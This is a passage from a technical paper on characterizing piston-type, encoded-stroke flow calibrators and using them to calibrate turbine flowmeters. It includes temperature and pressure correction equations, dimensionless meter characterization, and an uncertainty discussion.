\frac{K_{E0}V_{{COLL}^{’}T}\left\lbrack {1 - \alpha_{E}\left( {T_{E} - T_{0}} \right)} \right\rbrack\left\lbrack {1 - 2\alpha_{C}\left( {T_{C} - T_{0}} \right)} \right\rbrack\left\lbrack {1 - \frac{\left( {P_{C} - P_{0}} \right)D_{C0}}{t_{C0}E_{C}}} \right\rbrack}{N_{E}\left\lbrack {1 + 3\alpha_{F}\left( {T_{{COLL}^{’}T} - T_{C}} \right)} \right\rbrack\left\lbrack {1 - \frac{\left( {P_{{COLL}^{’}T} - P_{C}} \right)}{E_{F}}} \right\rbrack.} \\
\end{array}$$If *K*~Ć~ is defined as $$K_{Ć} = N_{E}/V_{{COLL}^{’}T},$$then $$\begin{array}{l}
{K_{C0} = K_{Ć} \times} \\
\frac{\left\lbrack {1 + 2\alpha_{C}\left( {T_{C} - T_{0}} \right)} \right\rbrack\left\lbrack {1 + \frac{\left( {P_{C} - P_{0}} \right)D_{C0}}{t_{C0}E_{C}}} \right\rbrack}{\left\lbrack {1 - 3\alpha_{F}\left( {T_{{COLL}^{’}T} - T_{C}} \right)} \right\rbrack\left\lbrack {1 + \frac{\left( {P_{{COLL}^{’}T} - P_{C}} \right)}{E_{F}}} \right\rbrack\left\lbrack {1 - \alpha_{E}\left( {T_{E} - T_{0}} \right)} \right\rbrack} \\
\end{array}$$or, to first order $$\begin{array}{l}
{K_{Ć} = K_{C0} \times} \\
{\frac{\left\lbrack {1 - 2\alpha_{C}\left( {T_{C} - T_{0}} \right)} \right\rbrack\left\lbrack {1 - \frac{\left( {P_{C} - P_{0}} \right)D_{C0}}{t_{C0}E_{C}}} \right\rbrack}{\left\lbrack {1 + 3\alpha_{F}\left( {T_{{COLL}^{’}T} - T_{C}} \right)} \right\rbrack\left\lbrack {1 - \frac{\left( {P_{{COLL}^{’}T} - P_{C}} \right)}{E_{F}}} \right\rbrack\left\lbrack {1 + \alpha_{E}\left( {T_{E} - T_{0}} \right)} \right\rbrack}.} \\
\end{array}$$When temperatures exceed those of the reference conditions and pressures are those for the reference conditions: $$K_{Ć} < K_{C0}.$$Thus, the observation made above is repeated here, namely, that when pressure effects can be neglected and when temperatures are above the reference conditions, the calibrator delivers, for the same encoder output pulses, more fluid volume than would occur under reference conditions.
It is also noted that [Eqs. (23)](#fd23-jresv97n5p509_A1b){ref-type="disp-formula"}--[(27)](#fd27-jresv97n5p509_A1b){ref-type="disp-formula"} can be combined to give: $$K_{C} = K_{C0}\frac{\left\lbrack {1 - \alpha_{E}\left( {T_{E} - T_{0}} \right)} \right\rbrack}{\left\lbrack {1 + 2\alpha_{C}\left( {T_{C} - T_{0}} \right)} \right\rbrack\left\lbrack {1 + \frac{\left( {P_{C} - P_{0}} \right)D_{C0}}{t_{C0}E_{C}}} \right\rbrack},$$which is the same as [Eq. (9)](#fd9-jresv97n5p509_A1b){ref-type="disp-formula"}.
It is noted that, in these two draw procedures, the decision to collect a sufficiently large number of encoder pulses should precede the operation. This number should be selected according to the desired precision for the calibrator constant, see [Eq. (3)](#fd3-jresv97n5p509_A1b){ref-type="disp-formula"}. In the reference conditions $$N_{E0} = K_{E0}L_{E0},$$and in the non-reference conditions $$N_{E} = K_{E}L_{E},$$but, to first order in temperature, $$K_{E} = K_{E0}\left\lbrack {1 - \alpha_{E}\left( {T_{E} - T_{0}} \right)} \right\rbrack,$$and $$L_{E} = L_{E0}\left\lbrack {1 + \alpha_{E}\left( {T_{E} - T_{0}} \right)} \right\rbrack.$$Combining [Eqs. (33)](#fd33-jresv97n5p509_A1b){ref-type="disp-formula"}--[(36)](#fd36-jresv97n5p509_A1b){ref-type="disp-formula"} therefore yields: $$N_{E} = K_{E}L_{E} = K_{E0}L_{E0} = N_{E0}.$$
This indicates that the precision criterion specified for the calibrator should be achieved via the number of pulses selected and the choice is not dependent upon whether reference or non-reference conditions prevail.
As stated above following [equation (17)](#fd17-jresv97n5p509_A1b){ref-type="disp-formula"}, the calibrator constants determined via the draw procedure are generally assumed to be independent of piston speed and fluid properties. Where this is not valid, efforts should be made to achieve this assumption, i.e., improving the piston seals or the calibrator should be characterized using techniques analogous to those for turbine meters as will be described below.
It should also be noted that in the above described draw procedures, the valve and pulse counting techniques must not introduce spurious effects. Spurious counting effects may result from the fluid dynamics in the valve as the flow is started and stopped in conjunction with starting and stopping the pulse count. If such an effect is present then it should be eliminated or proper account made for it so that the appropriate fluid volume is associated with the pulse total. This volume can be determined using the valve compensation techniques that are conventionally applied to diverter systems, see \[[@b4-jresv97n5p509_a1b]\].
To use the now-characterized calibrator, it is required that appropriate instrumentation be properly installed both to assure that [Eq. (12)](#fd12-jresv97n5p509_A1b){ref-type="disp-formula"} is satisfied and to measure the quantities involved in [Eqs. (9)](#fd9-jresv97n5p509_A1b){ref-type="disp-formula"} or [(10)](#fd10-jresv97n5p509_A1b){ref-type="disp-formula"} or [(32)](#fd32-jresv97n5p509_A1b){ref-type="disp-formula"} for the calibrator and [equations (28)](#fd28-jresv97n5p509_A1b){ref-type="disp-formula"} or [(29)](#fd29-jresv97n5p509_A1b){ref-type="disp-formula"} or [(30)](#fd30-jresv97n5p509_A1b){ref-type="disp-formula"} for dispensing precise volumes of fluid at specified conditions of temperature and pressure. Appropriate values are needed for the material constants---the thermal expansion coefficients *α*~E~, *α*~F~ and *α*~C~, the modulus of elasticity of the material of the calibrator cylinder, *E*~C~, and that of the fluid, *E*~F~, and the pertinent dimensions of the cylinder. Once the appropriate value for the constant *K*~C0~ has been installed in the calibrator software or the working procedures for the calibrator, the next step is to use the calibrator to calibrate a flowmeter.
3. Calibrator Use in Calibrating a Turbine Type Flowmeter
=========================================================
3.1 Reference Conditions
------------------------
To calibrate a turbine-type flowmeter at reference temperature and pressure conditions using the calibrator characterized as described above, the arrangement is sketched in [Fig. 6](#f6-jresv97n5p509_a1b){ref-type="fig"}. The temperature and pressure are the reference conditions denoted by *T*~0~ and *P*~0~. As stated above, *T*~0~=*T*~M0~=*T*~C0~ and *P*~0~*=P*~M0~*=P*~C0~. Applying again the conservation of mass principles,. and assuming that there is no change of mass within the control volume with time, [Eqs. (11)](#fd11-jresv97n5p509_A1b){ref-type="disp-formula"} and [(12)](#fd12-jresv97n5p509_A1b){ref-type="disp-formula"} indicate that $$\rho_{C0}{\overset{˙}{V}}_{C0} = \rho_{M0}{\overset{˙}{V}}_{M0},$$where *ρ*~C0~ and *ρ*~M0~ are the fluid densities in the calibrator and meter, respectively, at the reference conditions. The quantities ${\overset{˙}{V}}_{C0}$ and ${\overset{˙}{V}}_{M0}$ are the volumetric flowrates, respectively, in the calibrator and through the meter at the reference conditions.
Since reference conditions in cylinder and meter are assumed the same, the densities *ρ*~C0~ and *ρ*~M0~ are equal and therefore: $${\overset{˙}{V}}_{C0} = {\overset{˙}{V}}_{M0}.$$Since the pertinent time intervals are assumed the same: $$K_{C0} = \frac{K_{E0}}{{\overline{A}}_{C0}} = \frac{N_{E0}}{{\overline{A}}_{C0}L_{E0}} = \frac{f_{E0}}{{\overset{˙}{V}}_{C0}},$$where *f*~E0~ is the encoder frequency, and $$K_{M0} = \frac{N_{M0}}{V_{M0}} = \frac{f_{M0}}{{\overset{˙}{V}}_{M0}},$$where *f*~M0~ is the meter frequency.
In [Eqs. (40)](#fd40-jresv97n5p509_A1b){ref-type="disp-formula"} and [(41)](#fd41-jresv97n5p509_A1b){ref-type="disp-formula"}, the pulse counts *N*~E0~ and *N*~M0~ are to correspond to the respective volumes *V*~C0~ and *V*~M0~ which are assumed to be the same, or appropriate corrections are made to compensate for any differences between these volumes. Combining [Eqs. (40)](#fd40-jresv97n5p509_A1b){ref-type="disp-formula"} and [(41)](#fd41-jresv97n5p509_A1b){ref-type="disp-formula"} gives $$K_{M0} = \frac{f_{M0}}{f_{E0}}\frac{K_{E0}}{{\overline{A}}_{C0}} = \frac{N_{M0}}{N_{E0}}\frac{K_{E0}}{{\overline{A}}_{C0}} = \frac{N_{M0}}{N_{E0}} \bullet K_{C0} = \frac{f_{M0}}{f_{E0}} \bullet K_{C0},$$where *K*~M0~has units of pulses per volume at the reference conditions. The quantity *K*~E0~ is obtained from manufacturer's specifications, testing or [Eq. (1)](#fd1-jresv97n5p509_A1b){ref-type="disp-formula"}.
Conventional non-dimensionalization procedures can be applied to the flowmeter characteristics to produce a set of parameters which interrelate the significant inertial, viscous, and oscillatory effects that constitute the performance of the meter in the calibration conditions, see \[[@b6-jresv97n5p509_a1b],[@b7-jresv97n5p509_a1b]\]. In this way, the performance of the device can be predicted for other fluid and flow conditions where this set of parameters are the pertinent ones to describe the meter's performance. Of course, when other, different effects such as fluid compressibility or gravitational influences become significant, it should be expected that the initial parameterization needs to be modified to include such effects to obtain satisfactory description of meter performance, see \[[@b8-jresv97n5p509_a1b],[@b9-jresv97n5p509_a1b]\].
By normalizing the meter factor, *K*~M0~ and the fluid flowrate using the meter diameter, *D*~M0~ and the mean flow velocity ${\overset{˙}{V}}_{M0}/A_{M0} = U_{M0}$ and the fluid kinematic viscosity *υ*~0~, we can obtain, for example, the Strouhal number $$St = \frac{f_{M0}D_{M0}}{U_{M0}} = C_{1}K_{M0}D_{M0}^{3} \propto K_{M0}D_{M0}^{3},$$where *C*~1~=π/4. The Strouhal number is the ratio of characteristic meter frequency effects such as propeller rotation rate to fluid momentum effects. By effects here is meant either forces or energies. As such, the Strouhal number is a dimensionless meter factor.
Conventionally, it is fluid mechanical practice to formulate the Reynolds number as the ratio of fluid inertial to viscous effects, $$Re = \frac{D_{M0}U_{M0}}{\upsilon_{0}}.$$This is generally used to describe the domain of the meter calibration for which the corresponding Strouhal numbers specify the range of meter response. A Strouhal-Reynolds characterization of a pulse-producing flowmeter conforms to conventional fluid mechanical procedures and it is analogous to orifice metering practice where discharge coefficient (a ratio of fluid inertia to differential pressure effects) is described functionally or graphically versus Reynolds number. However, as noted in [Eq. (44)](#fd44-jresv97n5p509_A1b){ref-type="disp-formula"} the Reynolds number requires that the fluid velocity be known. Since this is the purpose for using the meter, an iteration technique is required to calculate the flowrate. To avoid such an iteration, turbine meter manufacturers have designed their products to have high levels of linearity over wide flowrate ranges. As a result of this, it has been conventional turbine meter practice to characterize performance via *K*-factor vs. frequency to kinematic viscosity ratio---the so-called Universal Viscosity Curve (UVC). In accord with the principles of dimensional similitude, the meter frequency to fluid viscous effects can be formulated using, as characteristic length scale, the meter diameter, *D*~M0~ as in [Eq. (44)](#fd44-jresv97n5p509_A1b){ref-type="disp-formula"}. This formulation can also be achieved via the product of Strouhal and Reynolds numbers; this product has been recently referred to, see \[[@b9-jresv97n5p509_a1b]\], as the Roshko number, $$R_{0} = \frac{f_{M0}D_{{M0}^{2}}}{\upsilon_{0}}.$$This Roshko number is the dimensionless version of the frequency-to-kinematic viscosity ratio used for the UVC. It is expected that the dimensionless version of the UVC---the Strouhal-Roshko characterization---should produce superior prediction of meter performance compared to the UVC by virtue of its more complete, i.e., dimensionless description of the inertial, viscous, and oscillatory effects that occur in the meter operation.
The question of which set of parameters best describes a turbine meter's performance should be determined using appropriate data sets. The specific design considerations of blade size and shape, internal meter geometry, bearing features, etc., can be expected to play significant roles in the selection of non-dimensional parameters. Where it may happen that the Reynolds number produces a better description of turbine meter performance, i.e., the data collapses better onto a single curve than achieved using the Roshko number, an iterative sequence of computations may be necessary to produce an accurate determination of flowrate. If the meter is very linear, such an iteration may not be required. Typical flowmeter characterization results are sketched in [Fig. 7](#f7-jresv97n5p509_a1b){ref-type="fig"}. Because it is not known whether Reynolds or Roshko number is the better parameter with which to characterize the meter performance, both shall be included in what follows.
In those instances where meter performance might deviate from the curve shown in [Fig. 7](#f7-jresv97n5p509_a1b){ref-type="fig"}, the interpretation would be that additional factors in the deviant conditions have become significant whereas these factors were insignificant in the calibration conditions. Examples might be fluid frictional effects in the turbine bearings produced by extreme viscosity variations from those prevailing in the calibration conditions, or liquid cavitation effects, etc.
The curve shown in [Fig. 7](#f7-jresv97n5p509_a1b){ref-type="fig"} is interpreted as the functional relationship between the Strouhal and Reynolds or Roshko numbers which are assumed to be the salient parameters describing the performance of this flowmeter over these calibration conditions. Inherent in this interpretation is the assumption that in any subsequent use of this functional relationship, the geometries of this meter, for example, the bearings or the propeller diameter are not changed relative to the selected characteristic length of the meter, i.e., the internal diameter, *D.* If such changes do occur it can be expected that the curve shown in [Fig. 7](#f7-jresv97n5p509_a1b){ref-type="fig"} can change. For example, if a smaller propeller were installed, this curve may retain its shape but lie below that shown in [Fig. 7](#f7-jresv97n5p509_a1b){ref-type="fig"}. A non-dimensional parameter which could take into account different propeller diameters is *ß=d/D*, where *d* is the propeller diameter. Accordingly, the curve shown in [Fig. 7](#f7-jresv97n5p509_a1b){ref-type="fig"} would pertain to the specific *β* for which the calibration was done. If other, smaller propellers were also calibrated, these results could be plotted in [Fig. 7](#f7-jresv97n5p509_a1b){ref-type="fig"} and parameterized with the smaller value of *β.* When the propeller and meter-body materials are the same and where pressure effects can be neglected, the *β* ratio will remain constant when the temperature changes. When the propeller and the meter-body materials are different, temperature changes can produce different *β* ratios. These different ratios can be computed using pertinent relationships. The computed results should then be used with calibration data taken for different *β* ratios to predict the meter performance at the different temperature conditions, see [Appendix B](#app2-jresv97n5p509_A1b){ref-type="app"}.
[Figure 7](#f7-jresv97n5p509_a1b){ref-type="fig"} is different from conventional turbine meter performance plots in which the meter's *K*-factor is plotted versus the ratio of frequency-to-kinematic viscosity. These conventional quantities are different from the Strouhal and Reynolds or Roshko number parameters by constant factors and by factors of the meter diameter raised to different exponents. These powers of the diameter should change only slightly with small changes in temperature and internal pressure. However, when conditions vary widely, the dimensionless formulations should be used and are expected to produce improved meter performance. Plots in the format of [Fig. 7](#f7-jresv97n5p509_a1b){ref-type="fig"} should then, with the exceptions of deviant phenomena becoming influential, apply to a wide range of specific, dimensional fluid property and flow conditions and produce accurate predictions of turbine meter performance.
Where conventional turbine meter practice is used and plots are produced for K-factor versus the ratio of frequency-to-kinematic viscosity, improved meter performance can be expected when these calibration results are corrected to specified reference conditions. Accordingly, the corrected results should incorporate temperature and internal pressure corrections for the ratios of meter diameters raised to the relevant exponent to predict meter performance for other fluid and flow conditions. For meters having good linearity characteristics, i.e., constancy of the meter factor over specified flowrate ranges, the more important of these two corrections is that for the *K*-factor, i.e., $$K_{M0} = K_{M}{(D_{M}/D_{M0})}^{3}.$$This stipulates that the meter frequency-to-fluid inertial effects ratio, i.e., Strouhal number be the same in the actual conditions as in the reference conditions. To first order in temperature and pressure, separately, the diametral ratio can be written, $$\begin{array}{l}
{\left( \frac{D_{M}}{D_{M0}} \right)^{3} = \lbrack 1 + 3\alpha_{M}(T_{M} - T_{M0})\rbrack} \\
{\times \left\lbrack {1 + \frac{3(P_{M} - P_{M0})D_{M0}}{2t_{M0}E_{M}}} \right\rbrack = \frac{K_{M0}}{K_{M}},} \\
\end{array}$$where *D*~M~ and *D*~M0~ are, respectively, the meter diameters at the non-reference conditions, *T*~M~ and *P*~M~ and reference conditions, *T*~M0~ and *P*~M0~. The quantities α~M~ and *E*~M~ are, respectively, the linear expansion coefficient and the modulus of elasticity of the meter body material for these conditions, and *t*~M0~ is the thickness of the meter body at reference conditions. The more significant of the two correction factors is usually that for temperature deviations from reference conditions. When the pressure correction can be neglected, $$K_{M0} = K_{M}\lbrack 1 + 3\alpha_{M}(T_{M} - T_{M0})\rbrack,$$or, to first order: $$K_{M} = K_{M0}\lbrack 1 - 3\alpha_{M}(T_{M} - T_{M0})\rbrack.$$This relationship duplicates that given in \[[@b10-jresv97n5p509_a1b]\].
3.2 Non-Reference Conditions
----------------------------
To calibrate a turbine-type flowmeter using the calibrator characterized as described above, the arrangement is sketched in [Fig. 8](#f8-jresv97n5p509_a1b){ref-type="fig"}. The temperature and pressure in the calibrator are the non-reference conditions denoted by *T*~C~ and *P*~C~. Applying again the conservation of mass principles, and assuming that there is no change of mass within the control volume with time, [Eq. (11)](#fd11-jresv97n5p509_A1b){ref-type="disp-formula"} and [(12)](#fd12-jresv97n5p509_A1b){ref-type="disp-formula"} indicate that $$\rho_{C}{\overset{\bullet}{V}}_{C} = \rho_{M}{\overset{\bullet}{V}}_{M} \cdot$$Since the fluid conditions in the cylinder and in the meter can be different, the ratio of the densities is $$\frac{\rho_{C}}{\rho_{M}} = \lbrack 1 - 3\alpha_{F}(T_{C} - T_{M})\rbrack\left\lbrack {1 + \frac{P_{C} - P_{M}}{E_{F}}} \right\rbrack,$$and from [Eq. (32)](#fd32-jresv97n5p509_A1b){ref-type="disp-formula"} and in a manner analogous to [Eq. (40)](#fd40-jresv97n5p509_A1b){ref-type="disp-formula"} $$\begin{array}{l}
{K_{C} = \frac{K_{E}}{{\overline{A}}_{C}} = \frac{f_{E}}{{\overset{\bullet}{V}}_{C}} =} \\
{K_{C0}\frac{\lbrack 1 - \alpha_{E}(T_{E} - T_{0})\rbrack}{\lbrack 1 + 2\alpha_{C}(T_{C} - T_{0}\rbrack\left\lbrack {1 + \frac{(P_{C} - P_{0})D_{C0}}{t_{C0}E_{C}}} \right\rbrack}.} \\
\end{array}$$Then, analogously to [Eq. (42)](#fd42-jresv97n5p509_A1b){ref-type="disp-formula"} $$\begin{array}{l}
{K_{M} = \frac{f_{M}}{f_{E}}K_{C}\frac{\rho_{M}}{\rho_{C}} = \frac{N_{M}}{N_{E}}K_{C0}} \\
{\times \frac{\lbrack 1 - \alpha_{E}(T_{E} - T_{0})\rbrack\lbrack 1 + 3\alpha_{F}(T_{C} - T_{M})\rbrack}{\lbrack 1 + 2\alpha_{C}(T_{C} - T_{0})\rbrack\left\lbrack {1 + \frac{(P_{C} - P_{0})D_{C0}}{t_{C0}E_{C}}} \right\rbrack\left\lbrack {1 + \frac{(P_{C} - P_{M})}{E_{F}}} \right\rbrack},} \\
\end{array}$$where *K*~M~ has units of pulses per volume at the specific, non-reference meter conditions.
As stated above after [Eq. (41)](#fd41-jresv97n5p509_A1b){ref-type="disp-formula"}, the pulse totals from the meter and the encoder have to correspond to the same displaced volume or time interval. If compensations are needed to achieve this correspondence, these should be done and results used in [Eq. (53)](#fd53-jresv97n5p509_A1b){ref-type="disp-formula"}.
By normalizing this meter factor, *K*~M~ and the fluid flowrate using the non-reference meter diameter, *D*~M~, and fluid kinematic viscosity, υ, we obtain Strouhal and Reynolds or Roshko numbers $$St = f_{M}D_{M}/U_{M} = C_{1}K_{M}D_{M}^{3},$$where *C*~1~=π/4, and $$Re = D_{M}U_{M}/\upsilon$$or $$Ro = \frac{f_{M}D_{M}^{2}}{\upsilon}.$$Using these dimensionless parameters, the performance for the meter can be plotted; results should be as shown in [Fig. 7](#f7-jresv97n5p509_a1b){ref-type="fig"}. As noted above in [Eqs. (43)](#fd43-jresv97n5p509_A1b){ref-type="disp-formula"}--[(45)](#fd45-jresv97n5p509_A1b){ref-type="disp-formula"}, the characteristics of meter factor and diameter at reference and non-reference conditions are interrelated and the dependence of the fluid's kinematic viscosity can be written functionally as $$\upsilon = \upsilon_{0}\lbrack T,T_{0},P,P_{0}\rbrack.$$With the performance curve given in [Fig. 7](#f7-jresv97n5p509_a1b){ref-type="fig"} and the relationships given in [Eqs. (43)](#fd43-jresv97n5p509_A1b){ref-type="disp-formula"}--[(45)](#fd45-jresv97n5p509_A1b){ref-type="disp-formula"}, or [(54)](#fd54-jresv97n5p509_A1b){ref-type="disp-formula"}--[(57)](#fd57-jresv97n5p509_A1b){ref-type="disp-formula"}, one is now ready to use the flowmeter to make a flowrate measurement.
4. Using a Turbine-Type Flowmeter To Make a Measurement
=======================================================
4.1 Reference Conditions
------------------------
Given that the meter performance characteristics are as shown in [Fig. 7](#f7-jresv97n5p509_a1b){ref-type="fig"}, or less preferably but more conventionally as in [Fig. 9](#f9-jresv97n5p509_a1b){ref-type="fig"}, one can quantify the meter linearity over a specified flowrate range. The meter linearity is conventionally the average of the maximum and minimum values of the meter factor (Strouhal number) over this range; normalized by the average meter factor, see \[[@b3-jresv97n5p509_a1b] and [@b10-jresv97n5p509_a1b]\]. For the meter performance shown in [Fig. 7](#f7-jresv97n5p509_a1b){ref-type="fig"}, the mean value of the Strouhal Number, $\overline{St}$ gives the mean meter factor, via $${\overline{K}}_{M0} = \frac{\overline{St}}{C_{1}D_{M0}^{3}},$$where *C*~1~=π/4. The flowrate is determined via $${\overset{\bullet}{V}}_{M0} = \frac{f_{M0}}{{\overline{K}}_{M0}} = \frac{C_{1}D_{M0}^{3}f_{M0}}{\overline{St}}.$$This result would pertain to any flowrate over the range specified for the meter's linearity.
If it is desired to improve the accuracy of this flowrate determination, this could be done by using, for example, the curve shown in [Fig. 7](#f7-jresv97n5p509_a1b){ref-type="fig"} or close approximations to it. With advances in today's computer technology, this type of process can be readily installed in the secondary devices used with flowmeters. For the specific frequency from the meter, the Roshko number can be calculated directly and then used to determine the corresponding Strouhal number. For the case where the meter is characterized using Strouhal and Reynolds parameters, the process to determine an accurate flowrate should be iterative. This iteration process should begin using a mean value of meter factor, such as given in [Eq. (58)](#fd58-jresv97n5p509_A1b){ref-type="disp-formula"}, this value of meter factor enables a computation of the flowrate via [Eq. (59)](#fd59-jresv97n5p509_A1b){ref-type="disp-formula"}. Using this flowrate, the Reynolds number can be computed and then used to get the corresponding Strouhal number from the calibration curve and a refined value of flowrate. This process should be repeated until satisfactorily small changes are found in successive results. In this way, the accuracy level for the flowrate determination can be increased over the level associated with the meter's linearity. This can be done to the precision level associated with a specific flowrate as quantified in the calibration process. The resulting enhanced meter performance could amount to significant improvements in measurement accuracy. In the following, a Strouhal-Reynolds characterization of meter performance will be used since it is more conventional in fluid mechanics and since it may require the iteration procedure, described above, to be used.
4.2 Non-Reference Conditions
----------------------------
To describe meter performance in non-reference conditions, the meter characteristics shown in [Fig. 7](#f7-jresv97n5p509_a1b){ref-type="fig"} will be used. The reason for this is that the complete, non-dimensional assessment of meter frequency effects and fluid inertial and viscous effects are not complete in [Fig. 9](#f9-jresv97n5p509_a1b){ref-type="fig"}. For this reason, the non-reference meter diameter, *D*~M~, and frequency,*f*~M~, and the fluid's kinematic viscosity, *v*, should be used, in compatible units, to produce the Reynolds number for the non-reference conditions. This Reynolds number produces, using [Fig. 7](#f7-jresv97n5p509_a1b){ref-type="fig"}, the corresponding Strouhal number which with the meter diameter, *D*~M~, gives the meter factor, *K*~M~-The flowrate measurement is then obtained using $${\overset{\cdot}{V}}_{M} = \frac{f_{M}}{{\overline{K}}_{M}} = \frac{C_{1}f_{M}D_{M}^{3}}{\overline{St}}.$$This flowrate is correctly converted to reference conditions by specifying that the Strouhal number is the same for the non-reference and reference conditions, specified by this Reynolds number, i.e., $$St = C_{1}\frac{f_{M}D_{M}^{3}}{{\overset{\cdot}{V}}_{M}} = C_{1}\frac{f_{M0}D_{M0}^{3}}{{\overset{\cdot}{V}}_{M0}}.$$Therefore $${\overset{\cdot}{V}}_{M0} = {\overset{\cdot}{V}}_{M}\frac{f_{M0}}{f_{M}}\left( \frac{D_{M0}}{D_{M}} \right)^{3}.$$The reference to non-reference frequency ratio is obtained by specifying that Reynolds number similarity exists for these two conditions, i.e., $$Re = \frac{f_{M}D_{M}^{2}}{(St)\upsilon_{M}} = \frac{f_{M0}D_{M0}^{2}}{(St)\upsilon_{M0}}.$$It is noted that this is equivalent to stipulating that Roshko number similarity exists for these two conditions. From [Eq. (63)](#fd63-jresv97n5p509_A1b){ref-type="disp-formula"} $$\frac{f_{M0}}{f_{M}} = \frac{\upsilon_{M0}}{\upsilon_{M}}\left( \frac{D_{M}}{D_{M0}} \right)^{2}$$and $${\overset{\cdot}{V}}_{M0} = \frac{C_{1}f_{M}D_{M0}^{3}}{St}{(\frac{\mu_{M0}}{\mu_{M}})}\frac{\lbrack 1 + 2\alpha_{M}(T_{M} - T_{M0})\rbrack\left\lbrack {1 + \frac{(P_{M} - P_{M0})D_{M0}}{t_{M0}E_{M}}} \right\rbrack}{\lbrack 1 + 3\alpha_{F}(T_{M} - T_{M0})\rbrack\left\lbrack {1 - \frac{(P_{M} - P_{M0})}{E_{F}}} \right\rbrack}.$$
It is apparent that, to obtain high accuracy flowrate measurements using the procedures described above, appropriately high accuracy measurements are required for the component measurement systems and for the pertinent material properties as shown in [Eq. (65)](#fd65-jresv97n5p509_A1b){ref-type="disp-formula"}. In turn, it appears feasible that once systematic uncertainties are satisfactorily removed from calibration facilities, the measurement processes in calibration laboratories, and the measurement systems making on-line measurements will be commensurately improved and the uncertainty levels for these measurements can be predicted using such [Eqs. as (2)](#fd2-jresv97n5p509_A1b){ref-type="disp-formula"}, [(10)](#fd10-jresv97n5p509_A1b){ref-type="disp-formula"}, [(25)](#fd25-jresv97n5p509_A1b){ref-type="disp-formula"}, and [(65)](#fd65-jresv97n5p509_A1b){ref-type="disp-formula"}.
5. Discussion
=============
The above-derived results can, for the sake of brevity, be assessed by considering the effects of temperature and pressure on the respective factors--the calibrator and flowmeter constants and the flowrate measurement at reference conditions. To do this [Table 1](#t1-jresv97n5p509_a1b){ref-type="table"} shows, for specific material conditions and geometrical sizes, the variations associated with temperature and pressure effects separately and then summed together.
The results shown in the first row of [Table 1](#t1-jresv97n5p509_a1b){ref-type="table"} present the variations in calibrator constant *K*~C0~ determined using geometrical measurement methods for variations of ± 1 °C in temperature and ±l×l0^5^Pa (1 atm) in pressure. The material properties and geometrical assumptions are given under the headings of the respective columns. The worst-case combination of temperature and pressure variations taken separately are given in columns 7 and 12, respectively. These results are obtained by adding the absolute values of the component contributions. The total worst-case combination for temperature and pressure variations taken together is given in the column at the right side of the table. Accordingly, the total temperature effect on *K*~C0~ in the measurement method is five times larger than the pressure effect and the total of these gives an imprecision of ± 0.006%.
The results for *K*~C0~ determined using the draw technique are shown in the second row. These give a total temperature variation of ±0.095% owing mainly to fluid expansion effects. The pressure variation is noted to be a factor of about 16 less than this level and the total imprecision totals ±0.101% which is about a factor of 20 larger than the level achieved using the geometrical measurement technique.
The results for the meter factor, *K*~M0~, are given in the third row of the table. Here, at reference conditions, no additional uncertainties are shown over those for *K*~C0~ in accord with [Eq. (42)](#fd42-jresv97n5p509_A1b){ref-type="disp-formula"}.
The fourth row indicates that the total temperature variation for *St* is increased over that for *K*~M0~ by the amount allocated for meter expansion. This produces the ±0.101% uncertainty total for temperature which when added to the increased pressure total gives ±0.108%. This shows that while the Strouhal number is the preferred non-dimensional parameter to characterize the frequency effects of a meter, it has more factors than the conventional meter factor, *K*~M0~ and, therefore, it can have increased uncertainty. However, because the Strouhal number is a dimensionless ratio of frequency to inertial effects in the meter it should be successful in producing more satisfactory metering results for widely ranging conditions than can be done using a dimensional quantity such as *K*~M0.~
The fifth and sixth rows express the uncertainties for *K*~M~ and the corresponding Strouhal number in a manner analogous to that used to obtain values in rows three and four. However, as shown in [Eq. (53)](#fd53-jresv97n5p509_A1b){ref-type="disp-formula"} the uncertainties attributed to *K*~C0~ are increased appropriately due to encoder, calibrator, and fluid effects; and, in the case for *St*, meter effects. It is noted that the totaled uncertainties have essentially doubled in comparison with those for *K*~M0~.
While it is recognized that the conditions of ± 1 °C and ± 1 × 10^5^ Pa (1 atm) pressure variation can be termed large, it should be recognized that no uncertainty has been allocated in [Table 1](#t1-jresv97n5p509_a1b){ref-type="table"} for the uncertainty with which the material properties and geometrical dimensions are known or have been determined. As well, it should be recognized that these assumed conditions of ± 1 °C and ± 1×10^5^ Pa (1 atm) can in reality understate the actual variations that may exist in real situations where flowrate measurements can be attempted in harsh, hostile environments.
It should be emphasized that the above discussion deals only with the uncertainties associated with temperature and pressure imprecision and does not take into account contributions from flowmeter imprecision such as the variability of detecting meter pulses. Additionally, systematic errors which can greatly exceed the levels of imprecision are not included in any of the above.
A summary of the equations derived for characterizing piston-type, encoded-stroke calibrators, their calibration procedures, and the subsequent use of calibrated turbine meters is given in [Appendix C](#app3-jresv97n5p509_A1b){ref-type="app"}. These equations are found to be quite simple when reference conditions prevail. However, reference conditions are practically fictitious and therefore the performance of all of these devices should be considered as occurring in non-reference conditions. Given the capabilities available in today's computers, it is felt that the complete equations for these types of devices should be installed in the controlling and processing software so that when temperature and or pressure conditions become significant in these processes the results are accurate. Using these equations when temperature and or pressure effects are not significant produces negligible differences from the results at reference conditions.
6. Conclusions
==============
High accuracy fluid measurements can be attained when the important factors affecting the performances of both flowmeter calibrators and fluid meters are properly taken into account in the measurement processes of these devices. To do this--to first order temperature and pressure effects on both the calibrator and the meter as well as on the fluid--the equations derived above should be used as the basic system models for calibrator and meter. Specific features of calibrators need to be analyzed and, where pertinent, appropriate modifications to the above-derived equations should be made. Calibrators and metering units need to be properly instrumented and operated according to the required assumptions and techniques for handling the data. Where further increases in flow measurement accuracy are needed, either more accurate descriptions of currently considered factors should be made or additional factors not currently considered should be assessed and included as pertinent, or both.
This manuscript has evolved and been assembled as the results of many contributions, direct and indirect, from many sources---NIST staff, DoD metrologists, industrial personnel, and the flow measurement staff members in several national laboratories in Canada, Italy, and the U.K. Special thanks are due to K.R. Benson, NIST, Gaithersburg, for his reactions and contributions all through this effort; ideas and suggestions have also been incorporated from NIST Fluid Flow Group staff members: W. G. Cleveland, D. E. Hess, and N. E. Mease. It is especially pertinent to acknowledge the significant inputs and contributions made to these tests and this paper by V. Grabe, P. Olivier, and D. Ruffner. The secretarial contributions made by Mrs. G. M. Kline, NIST Fluid Flow Group, toward the production of this document are most gratefully acknowledged. In the DoD areas, it is pertinent to cite, alphabetically: Air Force: W. Callis, K. Hartz, B. Keeley, and J. Sharp; Army: J. Miller and D. Sherk; Navy: R. Cheesman, M. Gee, B. McBurney, and D. Todd.
*Symbol* *Description* *Dimensions*
------------------------------------------------- ------------------------------------------------------------------------------------------------------------------------------------------------------------- -----------------
